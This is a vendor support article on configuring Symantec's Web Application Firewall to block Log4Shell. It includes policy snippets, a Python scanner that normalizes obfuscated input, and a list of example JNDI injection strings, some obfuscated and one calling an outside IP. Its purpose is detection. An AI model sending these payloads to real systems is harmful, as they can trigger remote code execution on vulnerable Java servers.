Symantec Web Application Firewall (WAF) Protection for Log4Shell attack.

Article ID: 230903

Products

Web Application Firewall

Issue/Introduction

Protection Prerequisites:

ProxySG versions 6.7.x and greater 

Latest application protection version 20210921. See the “New attack permutations” section for examples of how to stay up to date even if you are not subscribed to application protection.

Symantec WAF detects payloads anywhere in the request, including all query string keys and values, header keys and values, POST keys and values, and cookie keys and values.

Resolution

The Symantec WAF has many engines and settings. The example below shows the minimum set of options that must be enabled on the WAF.

If the WAF was configured via the WAF Management Center UX, the default profile already includes this configuration.

<proxy>
http.request.normalization.default(auto)

<proxy>
http.request.detection.other.invalid_encoding(block) \
http.request.detection.other.multiple_encoding(block) 

define application_protection_set WAF_engines
engine=blacklist
end

<proxy>
http.request.detection.WAF_engines(block)

Vector Detection Results

While the set of permutations is very large, the following vectors are examples of attacks that are detected:

${env:jndi}

${jdni:}

${jndi:ldap}

${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}}/

${${uPBeLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}${fGX:L:KhSyJ:-:}${E:o:wsyhug:LGVMcx:-l}${Prz:-d}${d:PeH:OmFo:GId:-a}${NLsTHo:-p}${uwF:eszIV:QSvP:-:}${JF:l:U:-/}${AyEC:rOLocm:-:}}

${jndi:dns://45.83.64.1/securityscan-https:8443}

${${env:lsweqw:-j}ndi${env:lsweqw:-:}${env:lsweqw:-r}mi${env:lsweqw:-:}//IP}

${JNDI:LDAPS://}

${JNDI:RMI://}

${JNDI:DNS://}

${JNDI:NIS://}

${JNDI:IIOP://}

${JNDI:CORBA://}

${JNDI:NDS://}

${JNDI:HTTPS://}

${JNDI:HTTP://}

${jNDi:l%252564ap://}
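As an added illustration (not Symantec's code and not the WAF's actual engine), the Python below shows why the normalization settings above matter: it resolves `${...:-x}` default lookups and repeated percent-encoding until the value is stable, then checks every key and value of a constructed sample request, as the WAF does for query, header, POST and cookie data. Only the default-value lookup form is handled here; the request parts and the `q`, `User-Agent`, `X-Api-Version` and `session` names are constructed, while the payload strings are the vectors listed above.

```python
import re
from urllib.parse import unquote

# ${...:-default} lookups: Log4j substitutes the default text, so the normalizer
# resolves them the same way before matching (only this lookup form is handled).
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# Any ${ ... } lookup whose head names jndi, case-insensitive.
JNDI_LOOKUP = re.compile(r"\$\{[^}]*jndi", re.IGNORECASE)


def normalize(value: str, max_rounds: int = 5) -> str:
    """Undo repeated percent-encoding and resolve ${x:-y} defaults until stable."""
    for _ in range(max_rounds):
        collapsed = DEFAULT_LOOKUP.sub(lambda m: m.group(1), unquote(value))
        if collapsed == value:
            break
        value = collapsed
    return value


def is_jndi_probe(value: str) -> bool:
    """True when the normalized value contains a JNDI lookup."""
    return JNDI_LOOKUP.search(normalize(value)) is not None


def scan_request(parts):
    """parts: (location, key, value) triples; both key and value are inspected.
    Returns 'location:key' labels of the parts that carry a JNDI lookup."""
    return [f"{loc}:{key}" for loc, key, value in parts
            if is_jndi_probe(key) or is_jndi_probe(value)]


# Constructed sample request; the two payload strings are the page's own vectors.
SAMPLE_REQUEST = [
    ("query", "q", "log4j patch notes"),
    ("header", "User-Agent",
     "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}}/"),
    ("header", "X-Api-Version", "${jNDi:l%252564ap://}"),
    ("cookie", "session", "abc123"),
]

if __name__ == "__main__":
    for label in scan_request(SAMPLE_REQUEST):
        loc, key = label.split(":", 1)
        raw = next(v for l, k, v in SAMPLE_REQUEST if l == loc and k == key)
        print(f"blocked {label}: {raw!r} -> {normalize(raw)!r}")
```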

New attack permutations

New attack permutations are expected, and it is very likely that the signatures will need to be updated. Fortunately, the Symantec WAF lets an administrator write custom rules to detect these new vectors. The minimum policy required for this takes the following form:

<proxy>
http.request.normalization.default(auto)

<proxy>
deny http.request[name,value].regex = <latest security research regex1>
deny http.request[name,value].regex = <latest security research regex2>